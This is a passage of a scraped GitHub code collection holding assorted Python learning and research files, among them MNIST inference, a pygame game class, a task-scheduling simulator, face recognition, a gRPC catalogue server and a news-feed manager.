load_mnist\n\nfrom my_common import stop_watch\n\nfrom ch3_2_4 import sigmoid\nfrom ch3_5_1 import softmax\n\ndef get_data():\n (x_train, t_train), (x_test, t_test) = \\\n load_mnist(normalize=True, flatten=True, one_hot_label=False)\n\n return x_test, t_test\n\ndef init_network():\n with open('sample_weight.pkl', 'rb') as f:\n network = pickle.load(f)\n\n return network\n\ndef predict(network, x):\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n a3 = np.dot(z2, W3) + b3\n y = softmax(a3)\n\n return y\n\n@stop_watch\ndef main():\n # 推論処理\n\n # テストデータ\n x, t = get_data()\n # サンプルパラメータ\n network = init_network()\n\n accuracy_cnt = 0\n for i in range(len(x)):\n # x[i]: 1つの画像(784(28*28)ピクセル)\n # t[i]: x[i]のラベル(正解の数字)\n\n # ラベリング出力\n y = predict(network, x[i])\n # 出力のうち確率最大のものを取得\n p = np.argmax(y)\n\n # テスト側ラベルと一致していれば正答数+1\n if p == t[i]:\n accuracy_cnt += 1\n\n print('Accuracy: ' + str(float(accuracy_cnt) / len(x)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"tnbe21/my-deep-learning-from-scratch","sub_path":"ch3_neural_network/ch3_6_2_predict_mnist.py","file_name":"ch3_6_2_predict_mnist.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25097609423","text":"#Imports\r\nimport pygame\r\n\r\n#Classes\r\n\r\nclass Ship():\r\n\t\"\"\"This class contains vaues & actions our ship can perform in Zims invasion.\"\"\"\r\n\t\r\n\t#Constructor\r\n\tdef __init__(self,screen,current_settings):\r\n\t\t\r\n\t\t#Creating attributes for passed in values in use.\t\t\r\n\t\tself.screen = screen\r\n\t\tself.current_settings = current_settings\r\n\t\t\r\n\r\n\t\t#Load up ship image \r\n\t\tself.image = pygame.image.load('images/starfighter.bmp')\r\n\t\tself.rect = self.image.get_rect()\r\n\t\tself.screen_rect = screen.get_rect()\r\n\r\n\t\t#This sets up the start position on the display.\r\n\t\tself.rect.centerx = self.screen_rect.centerx\r\n\t\t\r\n\t\t#Creates float type of the ships current center for finer adjustment\r\n\t\tself.center = float(self.rect.centerx)\r\n\r\n\t\tself.rect.bottom = self.screen_rect.bottom\r\n\r\n\t\t#Movement flags\r\n\t\tself.move_right = False\r\n\t\tself.move_left = False\r\n\r\n\t#Methods\r\n\t\r\n\tdef blitme(self):\r\n\t\tself.screen.blit(self.image,self.rect)\r\n\r\n\tdef update_position(self):\r\n\t\t\"\"\"This method is used to check & perform the current movements of the ship.\"\"\"\r\n\t\tif self.move_right and self.rect.right < self.screen_rect.right:\r\n\t\t\tself.center += self.current_settings.ship_speed\r\n\t\tif self.move_left and self.rect.left > 0:\r\n\t\t\tself.center -= self.current_settings.ship_speed\r\n\t\t\t\r\n\t\t#Convert back to integer implicitly to perform movement\r\n\t\tself.rect.centerx = self.center\t","repo_name":"RyanMolyneux/Learning_Python","sub_path":"Alien_Invasion_Pr1/player_ship.py","file_name":"player_ship.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38489890186","text":"\"\"\"\nThis code runs the math behind the system\n\n-1 = tasks not schedulable\n\nInput Format = [Label, Worst Case, Period, Release, Invocation1...]\n\nOutput\n\"\"\"\nimport numpy as np\n\na = np.array([[0,3,8,0,2,1],[1,3,10,0,1,1],[2,1,14,0,1,1]])\n#a = np.array([[0,9,8,0,9,1]])\nz=0\nTend=-1\n\ndef sortit(a):\n i=0\n order = 1\n x = a.shape[0]\n while order==1:\n order=0\n for i in range(x-1):\n if (a[i,2] <= a[i+1,2]) and (a[i,3] == -1) and (a[i+1,3]!=-1):\n a[[i, i + 1]] = a[[i + 1, i]]\n order=1\n elif (a[i, 2] > a[i + 1, 2]) and (a[i + 1, 3] == -1) and (a[i,3]==-1):\n a[[i, i + 1]] = a[[i + 1, i]]\n order = 1\n elif (a[i,2]>a[i+1,2]) and (a[i+1,3]!=-1):\n a[[i,i+1]]=a[[i+1,i]]\n order=1\n\n\n return a\n\ndef findnext(a,Release,x):\n for i in range(x):\n if (Release[0,0]==a[i,0]) and (Release[0,3]!=-1):\n return i\n exit(-99)\n\n\ndef GetValues(a,Release,x,y):\n Value=np.zeros((x,2))\n\n for r in range(x):\n for i in range(x):\n if a[i,0]==Release[r,0]:\n Value[r,1]=a[i,2]\n # If released\n if Release[r,3]==0:\n Value[r,0]=a[i,1]\n elif Release[r,3]==-1 and Release[r,1]==0:\n Value[r,0]=a[i,1]\n\n else:\n temp=int(Release[r,1])\n Value[r,0]=a[i,temp+3]\n return Value\n\n\ndef calculateFrequency(a,Release,x,y,z):\n Values=GetValues(a,Release,x,y)\n #print(Values)\n Freq=0\n for r in range(x):\n Freq = Freq + Values[r, 0] / Values[r, 1]\n if z==1:\n a=0.5\n for i in range(3):\n temp = Freq-a\n if temp<0:\n Freq=a\n return Freq\n a=a+0.25\n\n return Freq\n\ndef CheckNextRelease(Release,TF,x,Tend):\n if TF>=Tend and Tend!=-1:\n TF=Tend\n return TF\n\n for i in range(x):\n if Release[i,3]==-1:\n if TF <= Release[i , 2]:\n return TF\n\n\n else:\n temp = Release[i , 2]\n return temp\n\n elif Release[i, 2] < TF and Release[i, 3] != -1:\n temp = Release[i, 2]\n return temp\n\n return TF\n\ndef assignoutput(a,b,output,Freq,TF,index):\n output[index, 2] = Freq\n\n output[index, 0] = output[index-1,1]\n output[index, 1] = TF\n if b!=-1:\n output[index, 3] = a[b, 0]\n else:\n output[index,3] = -1\n return output\n\ndef ReleaseNext(a,Release,x):\n for i in range(x):\n for R in range(x):\n if a[R,0]==Release[i,0]:\n t=R\n if Release[i,3]==-1:\n Release[i,3]=0\n Release[i,2]=Release[i,2]+a[t,2]\n return Release\n\ndef checkfinished(Release,x,y):\n for i in range(x):\n if Release[i,1]!=y:\n return 1\n elif Release[i,0]==-1 and Release[i,2]==0:\n return 0\n return 0\n\ndef checkRelease(Release,x):\n for i in range(x):\n if Release[i,3]!=-1:\n return 0\n return 1\n\ndef errorHandle(Release,output,x,index):\n #check if any tasks failed to run before deadline\n for i in range(x):\n if Release[i,2]>=output[index-1,1] and Release[i,3]!=-1:\n #If failed to run before deadline created error message in output\n output[index,:]=output[index-1,:]\n output[index,2]=-1\n output[index,3]=Release[i,0]\n index+=1\n #Update Release deadline of failed task\n for R in range(x):\n if a[R, 0] == Release[i, 0]:\n t = R\n Release[i, 2] = Release[i, 2] + a[R, 2] * (Release[i, 1] + 1)\n Release[i,1]+=1\n\ndef Run(a,z,Tend):\n #Initial sorting function to sort earliest deadline first\n a=sortit(a)\n i=0\n x = a.shape[0]\n y = a.shape[1] - 4\n\n # Release=[Tag, iteration,Deadline, Release flag, Time remaining on previous iteration]\n\n Release=np.zeros((x,5))\n\n for i in range(x):\n # determining if the task is released at zero or not\n if a[i,3]==0:\n # If released at 0 set the task deadline to the period\n Release[i,2]=a[i,2]\n else:\n # If the release is not at 0 set the deadline of the task to 0 and lower the invocation to indicate that the task should not run\n Release[i,2]=a[i,3]\n Release[i,3]=-1\n Release[i,1]=0\n # Coordinate the tag between the release and input data\n Release[i,0]=a[i,0]\n #Sort the Release to reorder for unreleased tasks\n\n sortit(Release)\n\n #print(a)\n #print(Release)\n\n #Create the output array to be large enough to fit worst case scenario\n\n #output = np.zeros((10, 4))\n output=np.zeros((x*x*y*2,4))\n\n #Initialise variables\n index=0\n R=0\n Freq=0\n\n #Run one iteration so that there is an output to avoid indexing error\n Freq=calculateFrequency(a,Release,x,y,z)\n\n #check if frequency requires runnign above 100%\n if Freq>1:\n Freq=1\n #print('there will be an error')\n\n # Associate line of input with Release\n b = findnext(a, Release, x)\n\n # Determine end time of task if no interuptions\n TF = a[b, 4] / Freq\n\n # Save the time temporarily\n temp = TF\n #Check if the task ran to completion\n TF = CheckNextRelease(Release, TF, x,Tend)\n\n output[0,3]=Release[0,0]\n output[0,0]=0\n output[0,1]=TF\n output[0,2]=Freq\n index+=1\n #print(output)\n\n #check if the task ran to completion\n if temp==TF:\n Release[0,3]=-1\n Release[0,1]=1\n else:\n temp = int(Release[0, 1] + 3)\n Release[0, 4] = a[b, 4] - (output[index - 1, 1] - output[index - 1, 0]) * Freq\n ReleaseNext(a, Release, x)\n\n # Sort Release to put earliest deadline first that has released\n Release = sortit(Release)\n #print(Release)\n #check if we have anything to run\n while checkfinished(Release,x,y):\n #check for errors\n for i in range(x):\n if Release[i, 2] <= output[index - 1, 1] and Release[i, 3] != -1:\n # If failed to run before deadline created error message in output\n output[index, :] = output[index - 1, :]\n output[index, 2] = -1\n output[index, 3] = Release[i, 0]\n index += 1\n # Update Release deadline of failed task\n for R in range(x):\n if a[R, 0] == Release[i, 0]:\n t = R\n Release[i, 2] = Release[i, 2] + a[t, 2] * (Release[i, 1] + 1)\n Release[i, 1] += 1\n Release[i,4]=0\n if Release[i,1]>=y:\n Release[0,2]=np.max(Release)*(y+1)+1\n Release[i,3]=-1\n if TF==Tend and Tend!=-1:\n return output\n\n if checkRelease(Release,x):\n # Ensure earliest deadline task is next to run.\n sortit(Release)\n #print(Release)\n # Set end time equal to start of next release\n TF=Release[0,2]\n\n # As no task should be running set task to -1\n b=-1\n\n # Calculate the Waiting Frequency cause we can\n Freq=calculateFrequency(a,Release,x,y,z)\n\n # Update the output to reflect that we are waiting\n output=assignoutput(a,b,output,Freq,TF,index)\n\n # Increment index to reflect the change in state\n index+=1\n\n # Since we have hit a release, release the next task\n Release=ReleaseNext(a,Release,x)\n\n else:\n # Ensure first task is next task to run\n sortit(Release)\n #print(Release)\n # Find associate row of a to first row of Release\n b=findnext(a,Release,x)\n\n # Calculate the Frequency based on current system state\n Freq=calculateFrequency(a,Release,x,y,z)\n\n #Check for over frequency\n if Freq > 1:\n Freq = 1\n #print('there will be an error')\n\n #Prepare to run next iteration\n c= int(Release[0,1])+4\n\n #Calculate the time the task will finish assuming it is running clean\n if Release[0,4]==0:\n TF=a[b,c]/Freq + output[index-1,1]\n #Calculate time to finish the task that has already been started\n else:\n\n TF=Release[0,4]/Freq + output[index-1,1]\n\n #Save the time temporarily\n temp=TF\n\n #Check if the task will finish before the next task releases\n TF=CheckNextRelease(Release,TF,x,Tend)\n\n #update output regardless of task finishing successfully or not\n output = assignoutput(a, b, output, Freq, TF, index)\n\n # Increment index to reflect the change in state\n index += 1\n\n #if there was no change in final time task completed successfully therefore Release must be updated accordingly\n if TF==temp:\n # Increment to show that previous Invocation was run successfuly\n Release[0,1]+=1\n #remove any leftover time from previous run\n Release[0,4]=0\n #Set the flag to show task has run to completion\n Release[0, 3] = -1\n # Check if that was the last iteration to run\n if Release[0,1]>=y:\n Release[0,2]=np.max(Release)*(y+1)+1\n\n # For when they did not match up and the previous task did not finish running\n else:\n temp=int(Release[0,1]+3)\n Release[0,4] = a[b,c]-(output[index-1,1] - output[index-1,0])*Freq\n ReleaseNext(a,Release,x)\n\n #print(output)\n return output\n\n#print(Run(a,z,Tend))\n","repo_name":"DanielLoeffeler/467project","sub_path":"Math.py","file_name":"Math.py","file_ext":"py","file_size_in_byte":9888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74675884588","text":"import requests\nimport backoff\n\n@backoff.on_exception(backoff.expo,\n requests.exceptions.RequestException,\n max_tries=2)\ndef get_site_info(ip):\n \"\"\"\n Takes an IP Address as input and returns an object \n with the header, server info, ip and page\n :param ip - A valid IP address\n \"\"\"\n r = requests.get(\"http://{0}\".format(ip))\n headers = r.headers\n page = r.text\n server = headers.get(\"Server\")\n return { \"IP\": ip, \"headers\" : headers,\n \"Server\" : server, \"page\" : page}\n\ndef get_site_info_objs(ip_addresses):\n \"\"\"\n Takes a list of IP addresses and returns site info\n objects for each. Prints error message if call fails\n unexpectedly\n :param ip_addresses - A list of valid IP Addresses\n \"\"\"\n site_info_objs = []\n for ip in ip_addresses:\n try:\n site_info = get_site_info(ip)\n site_info_objs.append(site_info)\n except Exception as e:\n print(\"Unable to reach IP: {0}. Proceeding...\".format(ip))\n return site_info_objs\n","repo_name":"kavanista/ip_checker","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42466729606","text":"import subprocess\n\nif __name__ == \"__main__\":\n\n # python utils/run_kcap.py --create-mocks --noiseless-mocks --root-dir data/KiDS1000/mocks/noisefree/ --KiDS-data-file runs/mocks/cosebis/COSEBIs_KiDS1000_omega_cam.fits --run-type cosebis --run-name cosebis_base --no-c-term --no-2d-c-term --use-nz-files --overwrite\n\n script = \"utils/run_kcap.py\"\n root_dir = \"runs/mocks/cosebis/\"\n \n base_twopoint_file = \"data/KiDS1000/mocks/noisefree/cosebis_base/data/KiDS/COSEBIs_KiDS1000_omega_cam_mock_noiseless.fits\"\n \n # Need to change\n base_dz_cov_file = \"data/KV450/nofz/DIR_cov.asc\"\n\n twopoint_file = base_twopoint_file\n dz_cov_file = base_dz_cov_file\n\n sampler = \"multinest\"\n \n run_type = \"cosebis\"\n run_name_root = \"fast\"\n run_name = f\"{run_name_root}_{run_type}\"\n cmd = [\"--root-dir\", root_dir,\n \"--run-name\", run_name,\n \"--run-type\", run_type,\n \"--KiDS-data-file\", twopoint_file,\n \"--dz-covariance-file\", dz_cov_file,\n \"--sampler\", sampler,\n \"--sampler-config\", \"multinest_efficiency\", \"0.3\",\n \"--sampler-config\", \"nested_sampling_tolerance\", \"1.0e-2\",\n \"--cosebis-2d-c-term-file\", \"cosebis/example_files/cosebis/inputs/En_2D_cterm_KV450.ascii\",\n \"--cosebis-cos4phi-file\", \"cosebis/example_files/cosebis/inputs/En_cos4phi_KV450.ascii\",\n \"--cosebis-sin4phi-file\", \"cosebis/example_files/cosebis/inputs/En_sin4phi_KV450.ascii\",\n \"--use-nz-files\",\n \"--overwrite\"]\n subprocess.run([\"python\", script] + cmd, check=True)","repo_name":"KiDS-WL/kcap","sub_path":"runs/mocks/cosebis/cosebis_configs.py","file_name":"cosebis_configs.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25541879002","text":"from concurrent import futures\nimport datetime\nimport logging\n\nimport grpc\nimport redis\nfrom tinydb import TinyDB, Query\n\nimport catalogue_pb2\nimport catalogue_pb2_grpc\n\nclass Catalogue(catalogue_pb2_grpc.CatalogueServicer):\n\n def GetGames(self, request, context):\n db = TinyDB('games.json')\n result = db.all()\n print('result\" ' + str(result))\n \n response = catalogue_pb2.GetGamesResponse(games=result)\n print('response: ' + str(response))\n \n # Weblog\n try:\n conn = redis.StrictRedis(host='redis', port=6379)\n conn.set(\"log.catalogue-server.\" + str(datetime.datetime.now()), \"Catalogue.GetGames: \" + str(len(response.games)) + \" games\")\n except Exception as ex:\n print('Error:', ex)\n \n return response\n\n\ndef serve(port='50053'):\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n catalogue_pb2_grpc.add_CatalogueServicer_to_server(Catalogue(), server)\n server.add_insecure_port(f'[::]:{port}')\n server.start()\n logging.info(f'Server started, listening on port {port}')\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n serve()","repo_name":"lochlannoneill/SOFT8026-DataDrivenMicroservices-Docker-gRPC-Redis-RabbitMQ","sub_path":"server/catalogue/catalogue_server.py","file_name":"catalogue_server.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2622543848","text":"import face_recognition as facer\nimport sys, os, fnmatch\nimport cv2\n\nknown_face_encodings = []\nknown_face_names = []\n\n#load images and their names from a directory\ndef set_known_faces(dirname):\n for img in fnmatch.filter(os.listdir(dirname), '*.jpg'):\n image = facer.load_image_file(dirname + img)\n known_face_encodings.append(facer.face_encodings(image)[0])\n known_face_names.append(img[:-4])\n\ndef main():\n\n #load and encoding known faces\n set_known_faces(sys.argv[2])\n\n #load imagen to identify their faces\n test_img = facer.load_image_file(sys.argv[1])\n\n #find all faces in the test image and encoding them\n faces = facer.face_locations(test_img)\n encod_faces = facer.face_encodings(test_img, faces)\n\n #compare each of located image to identify with known faces\n for (top, right, bottom, left), encod_face in zip(faces, encod_faces):\n\n #compare located face with known faces\n matches = facer.compare_faces(known_face_encodings, encod_face)\n\n #get index of identify faces\n if True in matches:\n foundindex = matches.index(True)\n name = known_face_names[foundindex]\n else:\n name = \"Unknown\"\n\n #draw a box in the located faces with their identified name\n cv2.rectangle(test_img, (left, top), (right, bottom), (0, 255, 0), 2)\n cv2.rectangle(test_img, (left, bottom - 35), (right, bottom), (0, 255, 0), cv2.FILLED)\n cv2.putText(test_img, name, (left + 6, bottom - 6), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.0, (255, 255, 255), 1)\n\n #show the results\n cv2.imshow(\"Face ID\", test_img)\n\n #exit window\n cv2.waitKey(0) \n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()","repo_name":"lechugalf/face-id","sub_path":"IdentifyFaces/IdentifyFaces.py","file_name":"IdentifyFaces.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"36574136657","text":"\n## Python Crash Course\n\n# Exercise 3.6: More Guests: \n# You just found a bigger dinner table, so now more space is available . Think of three more guests to invite to dinner.\n# • Start with your program from Exercise 3-4 or Exercise 3-5. \n# Add a print statement to the end of your program informing people that you found a bigger dinner table.\n# • Use insert() to add one new guest to the beginning of your list.\n# • Use insert() to add one new guest to the middle of your list.\n# • Use append() to add one new guest to the end of your list.\n# • Print a new set of invitation messages, one for each person in your list.\n\n\ndef main():\n \n # Prepare empty list for invitees \n dinnerInvitees = []\n\n # Add invitees one by one in the invitees list\n dinnerInvitees.append('Andrew Ng')\n dinnerInvitees.append('Narendra Modi')\n dinnerInvitees.append('Jordon')\n sendInvites(dinnerInvitees)\n \n # Following person cant make it to the dinner party\n personWhoCantMake = dinnerInvitees.pop(1)\n\n # Print that one of the Guests cant make it to the party\n print(personWhoCantMake,\"can't make it to the birthday party!\")\n\n # Following person is the new guest to the party\n anotherGuestToInvite = 'Abdul Kalam'\n print(anotherGuestToInvite,\"is coming to the party!!\")\n print(\"Sending second set of invites..\")\n\n # Add new gues to the list\n dinnerInvitees.insert(1, anotherGuestToInvite)\n \n # Send another set of invites\n sendInvites(dinnerInvitees)\n\n # Insert one guest at the top of the list\n dinnerInvitees.insert(0, 'Aryabhatta')\n\n # Insert one guest in the middle of the list\n dinnerInvitees.insert(2, 'Ramanujan')\n\n # Append one guest to the end of the list\n dinnerInvitees.append('ShriKrishna')\n\n # Send invitations one last time\n sendInvites(dinnerInvitees)\n\n\n\ndef sendInvites(dinnerInvitees):\n \n # Send invitation to invitees\n for i in range(len(dinnerInvitees)):\n \n # Generic greeting message\n greetingMessage = \"Hi \" + str(dinnerInvitees[i]) + \", it's my birthday today, would you join us for the dinner? \" \\\n \"\\nWe also have following guests joining us: \"\n \n # Create list of other guests at the dinner \n listOfInvitees = dinnerInvitees.copy()\n del listOfInvitees[i]\n \n # Print invitation\n print(\"\\n### \\t Birthday Bash \\t ###\")\n print(greetingMessage)\n\n # Print list of other guests\n for x in range(len(listOfInvitees)):\n print(listOfInvitees[x])\n\n # Print end of invitation \n print(\"\\n###########################\\n\\n\") \n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"akshaymoharir/PythonCrashCourse","sub_path":"chapter_3/ex_3-6.py","file_name":"ex_3-6.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19495748986","text":"import tkinter as tk\r\nimport turtle as tt\r\n\r\nclass Panel():\r\n def __init__(self, canvas):\r\n self.screen = tt.TurtleScreen(canvas)\r\n self.path = tt.RawTurtle(self.screen)\r\n \r\n def drawTriangle(self):\r\n self.path.circle(100, 360, 3)\r\n\r\nclass Application(tk.Frame):\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.pack()\r\n self.create_widgets()\r\n self.panel = Panel(self.canvas)\r\n \r\n def create_widgets(self):\r\n \r\n framePanel = tk.Frame(self, width=200, height=800, highlightbackground='#FF0000', highlightcolor='#FF0000', highlightthickness=1, )\r\n framePanel.pack(side='left', fill='y')\r\n \r\n frameCanvas = tk.Frame(self, width=1000, height=800, highlightbackground='#FF0000', highlightcolor='#FF0000', highlightthickness=1, )\r\n frameCanvas.pack(side='right', fill='y')\r\n \r\n self.canvas = tk.Canvas(frameCanvas, width=1000, height=800, bg='#000000')\r\n self.canvas.pack()\r\n \r\n self.btn_shape_trangle = tk.Button(framePanel, text='画三角形', command=self.cmd_shape_trangle)\r\n self.btn_shape_trangle.pack(side=\"top\", fill='y')\r\n \r\n def cmd_quit(self):\r\n self.master.destroy()\r\n \r\n def cmd_shape_trangle(self):\r\n self.panel.drawTriangle()\r\n \r\n\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n root.title(\"Hello world\")\r\n #root.geometry(\"1400x900\")\r\n app = Application(master=root)\r\n app.mainloop()\r\n","repo_name":"Infoleading/demo-python","sub_path":"TKinter/turtlePanel.py","file_name":"turtlePanel.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25077342960","text":"import json\r\nfrom difflib import SequenceMatcher\r\ndata = json.load(open(\"data.json\"))\r\ndef get_meaning(word):\r\n word = word.lower()\r\n if word in data:\r\n return data[word]\r\n else:\r\n for w in data:\r\n similarity_ratio = SequenceMatcher(None, word , w).ratio()\r\n if (float(similarity_ratio) > 0.7) :\r\n print(\"did you mean %s ? \" % w )\r\n decision = input(\"type y for yes or n for no or h for home : \\t\")\r\n if decision == \"y\":\r\n return data[w]\r\n elif decision == \"h\":\r\n return \"Back to home\"\r\n else:\r\n print(\"checking...\")\r\n else:\r\n continue\r\n return \"This is Not Even A WOOORD!!!!\"\r\n\r\nwhile(1):\r\n word = str(input(\"Enter a word:\"))\r\n if word != \"q\":\r\n print(get_meaning(word))\r\n print(\"type 'q' to exit program\")\r\n else:\r\n break\r\n","repo_name":"youssefadelG/Simple-Dictionary-app","sub_path":"Simple_dictionary.py","file_name":"Simple_dictionary.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22525627727","text":"class Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n if root == None:\n return 0\n\n deepestValidDepthSoFar = 0\n validNode = root\n\n # iterative dfs\n stack = [(root, 0)] # (node, depth)\n while stack:\n currItem = stack.pop(-1)\n currNode, currDepth = currItem[0], currItem[1]\n # print(\"==== Outer DFS from currNode: \", currNode.val if currNode != None else None)\n if currNode != None:\n seenValues = set()\n # print(\"Running inner dfs on currNode: \", currNode.val)\n self.verifyPandQExistFromRoot(currNode, p, q, seenValues)\n # print(\"seenValues: after: \", seenValues)\n pqExistsFromRoot = (p.val in seenValues) and (q.val in seenValues)\n # print(\"pqExistsFromRoot: \", pqExistsFromRoot)\n if pqExistsFromRoot and currDepth > deepestValidDepthSoFar:\n deepestValidDepthSoFar = currDepth\n validNode = currNode\n \n stack.append((currNode.right, currDepth+1))\n stack.append((currNode.left, currDepth+1))\n\n return validNode\n\n def verifyPandQExistFromRoot(self, root, p, q, seenValues):\n if root == None:\n return \n\n if p.val in seenValues and q.val in seenValues:\n return \n \n seenValues.add(root.val)\n\n self.verifyPandQExistFromRoot(root.left, p, q, seenValues)\n self.verifyPandQExistFromRoot(root.right, p, q, seenValues)","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/leetcode/lc235_lowest_common_ancestor_bst.py","file_name":"lc235_lowest_common_ancestor_bst.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"8051856831","text":"import os, glob\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport datetime as dt\nfrom scipy.constants import * # Get physics constants\nfrom local_solar_time import local_solar_time\n\ndef resample_lst(data):\n '''\n Compute local solar time and resample data accordingly.\n '''\n time = np.arange(-1,23) # shifted time, since 23 is not valid\n lon_shifted = np.concatenate((data.lon.data[np.where(data.lon.data<180)],data.lon.data[np.where(data.lon.data>=180)]-360))\n lst = local_solar_time(time, lon_shifted) # get local solar-time wrt UTC and longitude\n x1, y1 = np.where((lst<11) & (lst>10)) # GOME equator crossing time 10.30 am = local time\n lst_lon = data.lon[x1] # note longitude and time\n lst_time = time[y1] # each time five-fold! Take only one later on.\n lst_time[np.where(lst_time==-1)] = 23 # \"shift\" time back\n data_sample = [] # resampling\n for iday in range(int(len(data.time)/24.)):\n data_test = []\n for i in range(len(lst_time[::5])):\n data_test.append(data.sel(time=data.time[iday*24+lst_time[::5][i]]).where(data.lon==lst_lon[5*i:5*(i+1)])) # select data accordingly\n data_test = xr.concat((data_test), dim='lon')\n data_test.coords['time'] = dt.datetime(data_test.coords['time.year'][0].data,data_test.coords['time.month'][0].data,iday+1,10)\n data_sample.append(data_test)\n data_sample = xr.concat((data_sample), dim='time')\n return data_sample\n\nnc_src = os.environ['DATA']\nsubd = '/BrXplo/EMAC_total_BrO/'\nsrc = 'BrO_col_2000*_BrXplo_ref.nc'\n\nfor file in sorted(glob.glob(nc_src+subd+src)):\n print(\"Reading \" + file)\n data = xr.open_dataset(file)\n data_sample = resample_lst(data)\n data_sample = data_sample.groupby(\"time.month\").mean(dim='time')\n data_sample = data_sample.mean(dim='lon')\n data_sample.to_netcdf(file[file.rfind(\"/\")+1:])\n print(\"Wrote \" + file[file.rfind(\"/\")+1:])\n\n","repo_name":"ziu1986/python_scripts","sub_path":"BrXplo/read_EMAC_BrO.py","file_name":"read_EMAC_BrO.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27566808938","text":"#from newsfeedmng import *\nimport newsfeedmng as mng\nfrom m3stringobject import text_normalize\nimport argparse\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-m\", \"--manual\", type=str, choices=['news', 'advert', 'joke'],\n help=\"The type of news\", action=\"store\")\ngroup.add_argument(\"-f\", \"--file\", type=str, choices=['csv', 'json', 'xml'],\n help=\"News from file\", action=\"store\")\nargs = parser.parse_args()\n\ndefault_csv_file = \"input_file.txt\"\ndefault_json_file = \"input_file.json\"\ndefault_xml_file = \"input_file.xml\"\n\n\ndef pfn(message):\n nt = []\n nt.append(message)\n return text_normalize(nt)\n\ndef manual_news(msg):\n input_text = input(\"Please write a text: \")\n ns = mng.WriteNews()\n news_location = ns.inputlocation()\n ns.writeintofile(ns.preparenews(input_text, news_location), msg)\n mng.WriteToDB(\"news\", ns.preparefordb(input_text, news_location))\n\ndef manual_advert(msg):\n input_text = input(\"Please write a text: \")\n ns = mng.WriteAdvert()\n exp_date = ns.inputexpdate()\n ns.writeintofile(ns.prepareadvert(input_text, exp_date), msg)\n mng.WriteToDB(\"advert\", ns.preparefordb(input_text, exp_date))\n\ndef manual_joke(msg):\n input_text = input(\"Please write a text: \")\n ns = mng.WriteJoke()\n output_message = ns.preparejoke(input_text)\n ns.writeintofile(output_message, msg)\n mng.WriteToDB(\"joke\", ns.preparefordb(input_text))\n\ndef file_csv():\n path_to_file = input(\"Please enter the path to txt file (default): \")\n fs = mng.WriteFromFile()\n if path_to_file == \"\":\n path_to_file = default_csv_file\n lines = fs.reading_file(path_to_file)\n else:\n lines = fs.reading_file(path_to_file)\n for line in lines:\n parsed_line = text_normalize(fs.parse_lines(line))\n if parsed_line[0].lower() == \"news\":\n ns = mng.WriteNews()\n output_message = ns.preparenews(parsed_line[2], parsed_line[1])\n ns.writeintofile(output_message, \"News\")\n mng.WriteToDB(\"news\", ns.preparefordb(parsed_line[2], parsed_line[1]))\n elif parsed_line[0].lower() == \"advert\":\n ns = mng.WriteAdvert()\n output_message = ns.prepareadvert(parsed_line[2].strip(), parsed_line[1].strip())\n ns.writeintofile(output_message, \"Advert\")\n mng.WriteToDB(\"advert\", ns.preparefordb(parsed_line[2].strip(), parsed_line[1].strip()))\n elif parsed_line[0].lower() == \"joke\":\n ns = mng.WriteJoke()\n output_message = ns.preparejoke(parsed_line[1].strip())\n ns.writeintofile(output_message, \"Joke\")\n mng.WriteToDB(\"joke\", ns.preparefordb(parsed_line[1].strip()))\n else:\n print(parsed_line[0] + \" No chance to parse\")\n\ndef file_json():\n path_to_file = input(\"Please enter the path to json file (default): \")\n fs = mng.WriteFromFile()\n if path_to_file == \"\":\n path_to_file = default_json_file\n t_json = fs.readingjson(path_to_file)\n else:\n t_json = fs.readingjson(path_to_file)\n for t_key in t_json.keys():\n nt = []\n nt.append(t_json[t_key][\"message\"])\n nm = text_normalize(nt)\n if t_key.lower() == \"news\":\n ns = mng.WriteNews()\n news_location = t_json[t_key][\"city\"].strip()\n output_message = ns.preparenews(nm[0], news_location)\n ns.writeintofile(output_message, \"News\")\n mng.WriteToDB(\"news\", ns.preparefordb(nm[0], 